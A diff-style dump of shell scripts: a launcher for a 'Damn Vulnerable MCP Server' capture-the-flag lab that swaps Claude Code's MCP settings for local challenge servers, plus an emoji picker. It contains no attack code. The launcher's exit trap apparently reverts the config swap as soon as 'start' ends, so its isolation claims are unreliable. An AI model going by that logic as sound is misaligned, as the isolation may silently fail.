|
||||
161: "snmp",
|
||||
162: "snmp-trap",
|
||||
179: "bgp",
|
||||
443: "https",
|
||||
445: "microsoft-ds",
|
||||
465: "smtps",
|
||||
514: "syslog",
|
||||
587: "submission",
|
||||
631: "ipp",
|
||||
993: "imaps",
|
||||
995: "pop3s",
|
||||
3306: "mysql",
|
||||
3389: "rdp",
|
||||
5432: "postgresql",
|
||||
5900: "vnc",
|
||||
8080: "http-proxy"
|
||||
}
|
||||
397
scripts/dvmcp
Executable file
397
scripts/dvmcp
Executable file
|
|
@ -0,0 +1,397 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: dvmcp
|
||||
# Description: Damn Vulnerable MCP Server launcher
|
||||
# Usage: dvmcp start|stop|status|logs|build
|
||||
|
||||
VERSION="1.1.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Container settings
|
||||
CONTAINER_NAME="dvmcp"
|
||||
IMAGE="dvmcp:latest"
|
||||
PORT_RANGE="9001-9010"
|
||||
|
||||
# Config file paths
|
||||
SETTINGS_DIR="${HOME}/.claude"
|
||||
PROD_CONFIG="${SETTINGS_DIR}/settings.json"
|
||||
CTF_CONFIG="${SETTINGS_DIR}/settings-ctf.json"
|
||||
BACKUP_CONFIG="${SETTINGS_DIR}/settings-prod-backup.json"
|
||||
CONFIG_STATE_FILE="${SETTINGS_DIR}/.dvmcp-config-state"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}dvmcp${NC} - Damn Vulnerable MCP Server Launcher v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " dvmcp <command>"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}build${NC} Build Docker image from Dockerfile"
|
||||
echo -e " ${CYAN}start${NC} Start DVMCP server"
|
||||
echo -e " ${CYAN}stop${NC} Stop DVMCP server"
|
||||
echo -e " ${CYAN}restart${NC} Restart DVMCP server"
|
||||
echo -e " ${CYAN}status${NC} Check if running"
|
||||
echo -e " ${CYAN}logs${NC} Show container logs"
|
||||
echo -e " ${CYAN}shell${NC} Open shell in container"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " dvmcp build # Build image (first time setup)"
|
||||
echo " dvmcp start # Launch DVMCP server"
|
||||
echo " dvmcp stop # Stop DVMCP server"
|
||||
echo " dvmcp logs # View logs"
|
||||
echo
|
||||
echo -e "${BOLD}ACCESS:${NC}"
|
||||
echo " Ports: ${BOLD}9001-9010${NC} (10 challenge instances)"
|
||||
echo " Test: ${BOLD}curl http://localhost:9001${NC}"
|
||||
echo
|
||||
echo -e "${BOLD}ABOUT:${NC}"
|
||||
echo " Damn Vulnerable MCP Server - Intentionally vulnerable MCP implementation"
|
||||
echo " Perfect for testing MCP security vulnerabilities"
|
||||
echo " GitHub: https://github.com/harishsg993010/damn-vulnerable-MCP-server"
|
||||
echo
|
||||
echo -e "${BOLD}SECURITY:${NC}"
|
||||
echo " This script automatically manages Claude Code config isolation:"
|
||||
echo " - ${GREEN}start${NC}: Backs up production config, loads CTF-only config"
|
||||
echo " - ${GREEN}stop${NC}: Restores production config automatically"
|
||||
echo " - ${YELLOW}Your production MCP servers are protected${NC}"
|
||||
echo
|
||||
echo -e "${BOLD}FIRST TIME SETUP:${NC}"
|
||||
echo " 1. Clone repo: git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git"
|
||||
echo " 2. cd damn-vulnerable-MCP-server/"
|
||||
echo " 3. Build: dvmcp build"
|
||||
echo " 4. Start: dvmcp start"
|
||||
echo " 5. ${BOLD}Restart Claude Code${NC} to load CTF config"
|
||||
}
|
||||
|
||||
check_docker() {
|
||||
if ! command -v docker &>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} Docker not installed"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
check_image_exists() {
|
||||
if ! docker images --format '{{.Repository}}:{{.Tag}}' | grep -q "^${IMAGE}$"; then
|
||||
return 1
|
||||
fi
|
||||
return 0
|
||||
}
|
||||
|
||||
create_ctf_config_template() {
|
||||
if [[ ! -f "$CTF_CONFIG" ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Creating CTF config template at ${CTF_CONFIG}..."
|
||||
cat > "$CTF_CONFIG" <<'EOF'
|
||||
{
|
||||
"mcpServers": {
|
||||
"Challenge 1": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9001/sse"]
|
||||
},
|
||||
"Challenge 2": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9002/sse"]
|
||||
},
|
||||
"Challenge 3": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9003/sse"]
|
||||
},
|
||||
"Challenge 4": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9004/sse"]
|
||||
},
|
||||
"Challenge 5": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9005/sse"]
|
||||
},
|
||||
"Challenge 6": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9006/sse"]
|
||||
},
|
||||
"Challenge 7": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9007/sse"]
|
||||
},
|
||||
"Challenge 8": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9008/sse"]
|
||||
},
|
||||
"Challenge 9": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9009/sse"]
|
||||
},
|
||||
"Challenge 10": {
|
||||
"command": "npx",
|
||||
"args": ["mcp-remote", "http://127.0.0.1:9010/sse"]
|
||||
}
|
||||
}
|
||||
}
|
||||
EOF
|
||||
echo -e "${GREEN}✓${NC} CTF config created"
|
||||
fi
|
||||
}
|
||||
|
||||
swap_to_ctf_config() {
|
||||
if [[ ! -f "$PROD_CONFIG" ]]; then
|
||||
echo -e "${RED}Error:${NC} Production config not found at ${PROD_CONFIG}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check if we're already in CTF mode
|
||||
if [[ -f "$CONFIG_STATE_FILE" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Already in CTF mode"
|
||||
return 0
|
||||
fi
|
||||
|
||||
# Create CTF config if it doesn't exist
|
||||
create_ctf_config_template
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Backing up production config..."
|
||||
cp "$PROD_CONFIG" "$BACKUP_CONFIG"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Switching to CTF config..."
|
||||
cp "$CTF_CONFIG" "$PROD_CONFIG"
|
||||
|
||||
# Mark that we're in CTF mode
|
||||
echo "CTF_MODE_ACTIVE" > "$CONFIG_STATE_FILE"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Switched to CTF config"
|
||||
echo -e "${YELLOW}Note:${NC} Production MCP servers are disabled until you stop DVMCP"
|
||||
}
|
||||
|
||||
restore_prod_config() {
|
||||
if [[ ! -f "$CONFIG_STATE_FILE" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Already using production config"
|
||||
return 0
|
||||
fi
|
||||
|
||||
if [[ ! -f "$BACKUP_CONFIG" ]]; then
|
||||
echo -e "${RED}Error:${NC} Backup config not found at ${BACKUP_CONFIG}"
|
||||
echo -e "${YELLOW}Warning:${NC} Cannot restore production config!"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Restoring production config..."
|
||||
cp "$BACKUP_CONFIG" "$PROD_CONFIG"
|
||||
|
||||
# Clean up backup and state file
|
||||
rm -f "$BACKUP_CONFIG" "$CONFIG_STATE_FILE"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Production config restored"
|
||||
}
|
||||
|
||||
cleanup_on_exit() {
|
||||
# If script exits unexpectedly while in CTF mode, restore production config
|
||||
if [[ -f "$CONFIG_STATE_FILE" ]]; then
|
||||
echo
|
||||
echo -e "${YELLOW}[!]${NC} Script interrupted, restoring production config..."
|
||||
restore_prod_config
|
||||
fi
|
||||
}
|
||||
|
||||
# Register cleanup trap
|
||||
trap cleanup_on_exit EXIT INT TERM
|
||||
|
||||
build_dvmcp() {
|
||||
# Check if Dockerfile exists in current directory
|
||||
if [[ ! -f "Dockerfile" ]]; then
|
||||
echo -e "${RED}Error:${NC} Dockerfile not found in current directory"
|
||||
echo
|
||||
echo -e "${YELLOW}Expected location:${NC} ./Dockerfile"
|
||||
echo
|
||||
echo -e "${CYAN}To build the image:${NC}"
|
||||
echo " 1. cd ~/path/to/damn-vulnerable-MCP-server/"
|
||||
echo " 2. Run: dvmcp build"
|
||||
echo
|
||||
echo -e "${CYAN}Or clone the repo:${NC}"
|
||||
echo " git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Building DVMCP Docker image..."
|
||||
echo -e "${YELLOW}Note:${NC} This may take several minutes..."
|
||||
|
||||
if docker build -t "$IMAGE" . ; then
|
||||
echo -e "${GREEN}✓${NC} DVMCP image built successfully"
|
||||
echo -e "${CYAN}[*]${NC} You can now run: ${BOLD}dvmcp start${NC}"
|
||||
else
|
||||
echo -e "${RED}✗${NC} Build failed"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
start_dvmcp() {
|
||||
# Check if image exists
|
||||
if ! check_image_exists; then
|
||||
echo -e "${RED}Error:${NC} DVMCP image not found"
|
||||
echo -e "${YELLOW}Run:${NC} ${BOLD}dvmcp build${NC} first"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Swap to CTF config BEFORE starting container
|
||||
swap_to_ctf_config
|
||||
echo
|
||||
|
||||
if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${YELLOW}⚠${NC} DVMCP already running"
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:9001-9010${NC}"
|
||||
return 0
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Starting existing container..."
|
||||
docker start "$CONTAINER_NAME"
|
||||
fi
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Starting DVMCP server..."
|
||||
echo -e "${YELLOW}Note:${NC} Mapping ports 9001-9010 for challenge instances"
|
||||
docker run -d --name "$CONTAINER_NAME" \
|
||||
-p 9001:9001 \
|
||||
-p 9002:9002 \
|
||||
-p 9003:9003 \
|
||||
-p 9004:9004 \
|
||||
-p 9005:9005 \
|
||||
-p 9006:9006 \
|
||||
-p 9007:9007 \
|
||||
-p 9008:9008 \
|
||||
-p 9009:9009 \
|
||||
-p 9010:9010 \
|
||||
"$IMAGE"
|
||||
fi
|
||||
|
||||
sleep 3
|
||||
|
||||
echo -e "${GREEN}✓${NC} DVMCP server started"
|
||||
echo
|
||||
echo -e "${BOLD}Challenge Instances:${NC}"
|
||||
echo -e " ${CYAN}Port 9001:${NC} http://localhost:9001"
|
||||
echo -e " ${CYAN}Port 9002:${NC} http://localhost:9002"
|
||||
echo -e " ${CYAN}Port 9003:${NC} http://localhost:9003"
|
||||
echo -e " ${CYAN}Port 9004:${NC} http://localhost:9004"
|
||||
echo -e " ${CYAN}Port 9005:${NC} http://localhost:9005"
|
||||
echo -e " ${CYAN}Port 9006:${NC} http://localhost:9006"
|
||||
echo -e " ${CYAN}Port 9007:${NC} http://localhost:9007"
|
||||
echo -e " ${CYAN}Port 9008:${NC} http://localhost:9008"
|
||||
echo -e " ${CYAN}Port 9009:${NC} http://localhost:9009"
|
||||
echo -e " ${CYAN}Port 9010:${NC} http://localhost:9010"
|
||||
echo
|
||||
echo -e "${YELLOW}Tip:${NC} Test with: ${BOLD}curl http://localhost:9001${NC}"
|
||||
echo -e "${YELLOW}Security:${NC} ${GREEN}Production MCP servers isolated${NC}"
|
||||
echo
|
||||
echo -e "${BOLD}⚠ IMPORTANT:${NC} Restart Claude Code to load CTF config"
|
||||
}
|
||||
|
||||
stop_dvmcp() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${CYAN}[*]${NC} Stopping DVMCP server..."
|
||||
docker stop "$CONTAINER_NAME"
|
||||
echo -e "${GREEN}✓${NC} DVMCP server stopped"
|
||||
else
|
||||
echo -e "${YELLOW}⚠${NC} DVMCP not running"
|
||||
fi
|
||||
|
||||
# Restore production config AFTER stopping container
|
||||
echo
|
||||
restore_prod_config
|
||||
echo
|
||||
echo -e "${BOLD}⚠ IMPORTANT:${NC} Restart Claude Code to load production config"
|
||||
}
|
||||
|
||||
restart_dvmcp() {
|
||||
stop_dvmcp
|
||||
sleep 2
|
||||
start_dvmcp
|
||||
}
|
||||
|
||||
show_status() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${GREEN}●${NC} DVMCP server is ${GREEN}running${NC}"
|
||||
echo
|
||||
echo -e "${BOLD}Active Ports:${NC}"
|
||||
docker port "$CONTAINER_NAME" 2>/dev/null | while IFS= read -r line; do
|
||||
echo -e " ${CYAN}${line}${NC}"
|
||||
done
|
||||
echo
|
||||
docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
|
||||
else
|
||||
echo -e "${RED}●${NC} DVMCP server is ${RED}stopped${NC}"
|
||||
|
||||
if ! check_image_exists; then
|
||||
echo
|
||||
echo -e "${YELLOW}Note:${NC} Image not built yet. Run: ${BOLD}dvmcp build${NC}"
|
||||
fi
|
||||
fi
|
||||
|
||||
echo
|
||||
echo -e "${BOLD}Config Status:${NC}"
|
||||
if [[ -f "$CONFIG_STATE_FILE" ]]; then
|
||||
echo -e " ${CYAN}Mode:${NC} CTF (isolated)"
|
||||
echo -e " ${CYAN}Active:${NC} ${CTF_CONFIG}"
|
||||
echo -e " ${CYAN}Backup:${NC} ${BACKUP_CONFIG}"
|
||||
else
|
||||
echo -e " ${CYAN}Mode:${NC} Production"
|
||||
echo -e " ${CYAN}Active:${NC} ${PROD_CONFIG}"
|
||||
fi
|
||||
}
|
||||
|
||||
show_logs() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
docker logs -f "$CONTAINER_NAME"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} DVMCP server not running"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
open_shell() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${CYAN}[*]${NC} Opening shell in DVMCP container..."
|
||||
docker exec -it "$CONTAINER_NAME" /bin/bash || docker exec -it "$CONTAINER_NAME" /bin/sh
|
||||
else
|
||||
echo -e "${RED}Error:${NC} DVMCP server not running"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Main
|
||||
check_docker
|
||||
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
case "$1" in
|
||||
build)
|
||||
build_dvmcp
|
||||
;;
|
||||
start|up)
|
||||
start_dvmcp
|
||||
;;
|
||||
stop|down)
|
||||
stop_dvmcp
|
||||
;;
|
||||
restart)
|
||||
restart_dvmcp
|
||||
;;
|
||||
status)
|
||||
show_status
|
||||
;;
|
||||
logs)
|
||||
show_logs
|
||||
;;
|
||||
shell|sh|bash)
|
||||
open_shell
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $1"
|
||||
echo "Run 'dvmcp --help' for usage"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
552
scripts/emoji
Executable file
552
scripts/emoji
Executable file
|
|
@ -0,0 +1,552 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: emoji
|
||||
# Description: Interactive emoji picker with fuzzy search
|
||||
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: emoji # interactive picker
|
||||
# emoji smile # search for "smile"
|
||||
|
||||
# Curated emoji database (emoji + keywords)
|
||||
emojis="😀 grinning face grin happy smile teeth cheerful
|
||||
😃 smiley smile happy face open mouth teeth yay
|
||||
😄 smile happy face grin laugh grinning eyes closed
|
||||
😁 beaming smile happy grin teeth eyes closed
|
||||
😆 laughing haha hahaha lol rofl laugh grinning squinting
|
||||
😅 grinning sweat relief phew close call nervous laugh
|
||||
🤣 rolling floor rofl laugh crying funny hilarious
|
||||
😂 tears joy laugh cry funny lol crying
|
||||
🙂 slightly smiling smile happy nice
|
||||
🙃 upside down smile sarcastic silly
|
||||
😉 wink flirt winky playful tease
|
||||
😊 smiling eyes smile happy blush shy
|
||||
😇 smiling halo angel innocent saint good
|
||||
🥰 smiling hearts love adore crush hearts eyes
|
||||
😍 heart eyes love crush hearts smiling loving
|
||||
🤩 star eyes starstruck excited wow amazed
|
||||
😘 blowing kiss love smooch mwah
|
||||
😗 kissing smile kiss puckered
|
||||
☺️ smiling face blushing happy relaxed
|
||||
😚 kissing closed eyes kiss affection
|
||||
😙 kissing smiling eyes kiss happy
|
||||
🥲 smiling tear touched grateful sad happy bittersweet
|
||||
😋 yummy delicious tasty savoring food yum
|
||||
😛 tongue playful silly teasing
|
||||
😜 winking tongue playful teasing kidding
|
||||
🤪 zany crazy wild silly wacky goofy
|
||||
😝 squinting tongue playful teasing horrible taste
|
||||
🤑 money mouth dollar rich greedy cash
|
||||
🤗 hugging hug embrace care support
|
||||
🤭 hand mouth oops giggle secret tee hee
|
||||
🫢 eyes hand peeking surprised shocked
|
||||
🫣 peeking through fingers scared peek boo hide
|
||||
🤫 shushing shh quiet secret silence hush
|
||||
🤔 thinking hmm wonder ponder contemplative
|
||||
🫡 salute respect military yes sir
|
||||
🤐 zipper mouth secret sealed silent quiet
|
||||
🤨 raised eyebrow skeptical suspicious doubt questioning
|
||||
😐 neutral face blank expressionless meh
|
||||
😑 expressionless annoyed blank dead inside
|
||||
😶 no mouth quiet silent speechless
|
||||
🫥 dotted line invisible disappearing transparent
|
||||
😶🌫️ face clouds confused foggy unclear
|
||||
😏 smirking smirk sly confident knowing
|
||||
😒 unamused annoyed unimpressed disappointed meh
|
||||
🙄 rolling eyes annoyed duh whatever sarcastic
|
||||
😬 grimacing awkward uncomfortable eek cringe teeth
|
||||
😮💨 exhaling sigh relief phew tired
|
||||
🤥 lying pinocchio lie nose growing
|
||||
🫨 shaking vibrating earthquake scared nervous
|
||||
😌 relieved calm peaceful content relaxed
|
||||
😔 pensive sad disappointed dejected down
|
||||
😪 sleepy tired yawn exhausted drowsy
|
||||
🤤 drooling hungry desire want covet
|
||||
😴 sleeping sleep zzz asleep tired snooze
|
||||
😷 face mask sick ill medical doctor protection
|
||||
🤒 thermometer sick ill fever temperature
|
||||
🤕 head bandage hurt injured wounded ow
|
||||
🤢 nauseated sick queasy gross disgusted
|
||||
🤮 vomiting puke sick throw up barf
|
||||
🤧 sneezing gesundheit achoo sick cold allergies
|
||||
🥵 hot face heat sweating fever burning
|
||||
🥶 cold face freezing frozen ice chilly
|
||||
🥴 woozy dizzy drunk tipsy disoriented confused
|
||||
😵 dizzy face knocked out stunned shocked
|
||||
😵💫 spiral eyes dizzy hypnotized dazed confused
|
||||
🤯 exploding head mind blown shocked amazed
|
||||
🤠 cowboy hat yee haw western
|
||||
🥳 party celebrating birthday festive celebration confetti
|
||||
🥸 disguise glasses nose mustache incognito spy
|
||||
😎 sunglasses cool awesome rad shades
|
||||
🤓 nerd geek smart glasses studious
|
||||
🧐 monocle fancy classy rich thinking posh
|
||||
😕 confused puzzled uncertain huh what
|
||||
🫤 diagonal mouth meh unsure uncertain
|
||||
😟 worried anxious concerned nervous afraid
|
||||
🙁 slightly frowning sad disappointed unhappy
|
||||
☹️ frowning sad upset disappointed down
|
||||
😮 open mouth shocked surprised wow oh
|
||||
😯 hushed surprised quiet wow shocked
|
||||
😲 astonished shocked amazed surprised stunned gasping
|
||||
😳 flushed embarrassed shy blush awkward
|
||||
🥺 pleading puppy eyes begging please sad mercy
|
||||
🥹 holding tears grateful touched emotional moved
|
||||
😦 frowning open mouth shocked worried concerned
|
||||
😧 anguished distressed worried scared oh no
|
||||
😨 fearful scared afraid anxious fear
|
||||
😰 anxious sweat nervous worried stressed cold sweat
|
||||
😥 sad relieved phew sweat disappointed but relieved
|
||||
😢 crying sad tear upset depressed
|
||||
😭 loudly crying sobbing bawling devastated
|
||||
😱 screaming fear shocked scared horrified scream
|
||||
😖 confounded frustrated scrunched upset confused
|
||||
😣 persevering struggling persevere powering through
|
||||
😞 disappointed sad unhappy let down dejected
|
||||
😓 downcast sweat sad worried stressed defeated
|
||||
😩 weary exhausted tired fed up frustrated
|
||||
😫 tired exhausted fed up frustrated stressed
|
||||
🥱 yawning tired bored sleepy boring exhausted
|
||||
😤 triumph victory proud won huffing
|
||||
😡 angry mad furious enraged pouting
|
||||
😠 angry mad annoyed frustrated upset
|
||||
🤬 cursing swearing profanity symbols angry fuck
|
||||
😈 smiling horns devil mischievous naughty evil
|
||||
👿 angry horns devil mad evil angry purple
|
||||
💀 skull dead death dying funny died
|
||||
☠️ skull crossbones poison danger pirate deadly
|
||||
💩 pile poo poop shit turd crap
|
||||
🤡 clown joker funny creepy circus
|
||||
👹 ogre monster oni demon red scary
|
||||
👺 goblin monster oni demon tengu red nose
|
||||
👻 ghost boo spooky halloween phantom
|
||||
👽 alien extraterrestrial et space ufo
|
||||
👾 alien monster space invader video game retro
|
||||
🤖 robot bot ai machine automation
|
||||
😺 grinning cat happy cat smiling feline
|
||||
😸 grinning cat smiling eyes happy feline
|
||||
😹 cat tears joy laughing funny cat
|
||||
😻 cat heart eyes love smiling adore
|
||||
😼 cat wry smile smirking sly cat
|
||||
😽 kissing cat love kiss affection
|
||||
🙀 weary cat surprised shocked scared screaming
|
||||
😿 crying cat sad tear upset
|
||||
😾 pouting cat angry grumpy annoyed mad
|
||||
🙈 see no evil monkey blind ignore cover eyes
|
||||
🙉 hear no evil monkey deaf ignore cover ears
|
||||
🙊 speak no evil monkey silence quiet shh cover mouth
|
||||
💋 kiss lips kissing love smooch
|
||||
💌 love letter heart mail valentine romance
|
||||
💘 heart arrow cupid love valentine romance
|
||||
💝 heart ribbon gift present love valentine
|
||||
💖 sparkling heart love sparkle shine
|
||||
💗 growing heart love expanding bigger
|
||||
💓 beating heart love heartbeat pulse
|
||||
💞 revolving hearts love two hearts circling
|
||||
💕 two hearts love romance pair couple
|
||||
💟 heart decoration love ornament purple white
|
||||
❣️ heart exclamation love emphasis
|
||||
💔 broken heart heartbreak sad breakup hurt
|
||||
❤️🔥 heart fire burning love passion flames
|
||||
❤️🩹 mending heart healing recovery bandaged
|
||||
❤️ red heart love valentine romance classic
|
||||
🩷 pink heart love soft cute gentle
|
||||
🧡 orange heart love friendship care
|
||||
💛 yellow heart love happiness friendship
|
||||
💚 green heart love nature jealous
|
||||
💙 blue heart love trust calm loyal
|
||||
🩵 light blue heart love peace calm soft
|
||||
💜 purple heart love compassion sensitivity
|
||||
🤎 brown heart love earth natural
|
||||
🖤 black heart dark sad evil goth
|
||||
🩶 grey heart love neutral indifferent
|
||||
🤍 white heart love pure clean innocent
|
||||
💯 hundred perfect 100 score full keep it 💯
|
||||
💢 anger symbol mad angry frustrated
|
||||
💥 collision bang boom crash pow explosion
|
||||
💫 dizzy stars sparkles dazed seeing stars
|
||||
💦 sweat droplets water splash wet
|
||||
💨 dashing dash wind fast smoke puff gone
|
||||
🕳️ hole pit gap void empty opening
|
||||
💬 speech balloon talk chat speaking
|
||||
👁️🗨️ eye speech bubble witness i see attention
|
||||
🗨️ left speech bubble chat talk dialog
|
||||
🗯️ right anger bubble mad shout yell
|
||||
💭 thought balloon thinking wondering daydream
|
||||
💤 zzz sleeping sleep snore tired
|
||||
👋 waving hand hi hello goodbye wave bye
|
||||
🤚 raised back hand stop wait hold on
|
||||
🖐️ hand fingers splayed five stop high five
|
||||
✋ raised hand stop halt wait high five
|
||||
🖖 vulcan salute spock star trek live long prosper
|
||||
🫱 rightwards hand pointing right offer
|
||||
🫲 leftwards hand pointing left offer
|
||||
🫳 palm down hand drop dismiss
|
||||
🫴 palm up hand offering receive give
|
||||
🫷 leftwards pushing hand stop reject push
|
||||
🫸 rightwards pushing hand stop reject push
|
||||
👌 ok hand okay perfect good chef kiss
|
||||
🤌 pinched fingers italian gesture what
|
||||
🤏 pinching hand tiny small little bit
|
||||
✌️ victory hand peace sign v two
|
||||
🤞 crossed fingers luck wish hope good luck
|
||||
🫰 hand index thumb snap click money pay
|
||||
🤟 love you hand sign i love you
|
||||
🤘 sign horns rock metal devil horns
|
||||
🤙 call me hand phone shaka hang loose
|
||||
👈 backhand index pointing left left that
|
||||
👉 backhand index pointing right right that
|
||||
👆 backhand index pointing up up above that
|
||||
🖕 middle finger fuck you rude profanity flip off
|
||||
👇 backhand index pointing down down below that
|
||||
☝️ index pointing up one attention above
|
||||
🫵 index pointing you your attention
|
||||
👍 thumbs up good yes like approve agree
|
||||
👎 thumbs down bad no dislike disapprove disagree
|
||||
✊ raised fist power solidarity resistance punch
|
||||
👊 oncoming fist punch bump fist bump bro
|
||||
🤛 left facing fist punch bump fist bump
|
||||
🤜 right facing fist punch bump fist bump
|
||||
👏 clapping hands applause clap bravo good job
|
||||
🙌 raising hands celebration praise yay hooray hallelujah
|
||||
🫶 heart hands love support care fingers
|
||||
👐 open hands hug embrace jazz hands
|
||||
🤲 palms together pray please namaste dua
|
||||
🤝 handshake deal agreement hello meeting shake
|
||||
🙏 folded hands pray thank you please thanks namaste
|
||||
✍️ writing hand writing write author pen
|
||||
💅 nail polish nails beauty makeup manicure slay
|
||||
🤳 selfie camera photo picture self portrait
|
||||
💪 flexed biceps strong muscle strength flex gym
|
||||
🦾 mechanical arm prosthetic cyborg robot strong
|
||||
🦿 mechanical leg prosthetic cyborg robot
|
||||
🦵 leg kick limb
|
||||
🦶 foot step kick toe
|
||||
👂 ear hearing listen sound
|
||||
🦻 ear hearing aid deaf listen
|
||||
👃 nose smell sniff scent
|
||||
🧠 brain smart intelligent think mind
|
||||
🫀 anatomical heart real heart organ medical
|
||||
🫁 lungs breathing respiratory organ medical
|
||||
🦷 tooth teeth dentist dental smile
|
||||
🦴 bone skeleton fossil
|
||||
👀 eyes looking watching see stare observe
|
||||
👁️ eye looking watching see vision
|
||||
👅 tongue lick taste silly
|
||||
👄 mouth lips kiss kissing speaking
|
||||
🫦 biting lip nervous anxious flirting
|
||||
👶 baby infant newborn child young
|
||||
🧒 child kid young boy girl
|
||||
👦 boy child kid young male
|
||||
👧 girl child kid young female
|
||||
🧑 person human adult gender neutral
|
||||
👱 blond person blonde hair fair
|
||||
👨 man male adult guy dude gentleman
|
||||
🧔 bearded person beard facial hair
|
||||
🧔♂️ man beard facial hair
|
||||
🧔♀️ woman beard facial hair
|
||||
👨🦰 man red hair ginger
|
||||
👨🦱 man curly hair
|
||||
👨🦳 man white hair old elderly
|
||||
👨🦲 man bald no hair
|
||||
👩 woman female adult lady
|
||||
👩🦰 woman red hair ginger
|
||||
👩🦱 woman curly hair
|
||||
👩🦳 woman white hair old elderly
|
||||
👩🦲 woman bald no hair
|
||||
🧓 older adult elderly senior old
|
||||
👴 old man elderly grandfather senior
|
||||
👵 old woman elderly grandmother senior
|
||||
🙍 person frowning sad upset disappointed
|
||||
🙍♂️ man frowning sad upset
|
||||
🙍♀️ woman frowning sad upset
|
||||
🙎 person pouting angry mad annoyed
|
||||
🙎♂️ man pouting angry mad
|
||||
🙎♀️ woman pouting angry mad
|
||||
🙅 person gesturing no nope stop
|
||||
🙅♂️ man gesturing no nope stop
|
||||
🙅♀️ woman gesturing no nope stop
|
||||
🙆 person gesturing ok okay yes
|
||||
🙆♂️ man gesturing ok okay yes
|
||||
🙆♀️ woman gesturing ok okay yes
|
||||
💁 person tipping hand information sass
|
||||
💁♂️ man tipping hand information
|
||||
💁♀️ woman tipping hand information sass
|
||||
🙋 person raising hand question attention pick me
|
||||
🙋♂️ man raising hand question
|
||||
🙋♀️ woman raising hand question
|
||||
🧏 deaf person sign language deaf
|
||||
🧏♂️ deaf man sign language
|
||||
🧏♀️ deaf woman sign language
|
||||
🙇 person bowing sorry thank you respect
|
||||
🙇♂️ man bowing sorry respect
|
||||
🙇♀️ woman bowing sorry respect
|
||||
🤦 person facepalming facepalm frustrated duh disappointed
|
||||
🤦♂️ man facepalming facepalm frustrated
|
||||
🤦♀️ woman facepalming facepalm frustrated
|
||||
🤷 person shrugging idk dunno shrug don't know whatever
|
||||
🤷♂️ man shrugging idk dunno
|
||||
🤷♀️ woman shrugging idk dunno
|
||||
🧑⚕️ health worker doctor nurse medical
|
||||
👨⚕️ man health worker doctor
|
||||
👩⚕️ woman health worker doctor nurse
|
||||
🧑🎓 student school college university
|
||||
👨🎓 man student graduate
|
||||
👩🎓 woman student graduate
|
||||
🧑🏫 teacher professor educator
|
||||
👨🏫 man teacher professor
|
||||
👩🏫 woman teacher professor
|
||||
🧑⚖️ judge law legal court justice
|
||||
👨⚖️ man judge law
|
||||
👩⚖️ woman judge law
|
||||
🧑🌾 farmer agriculture crops
|
||||
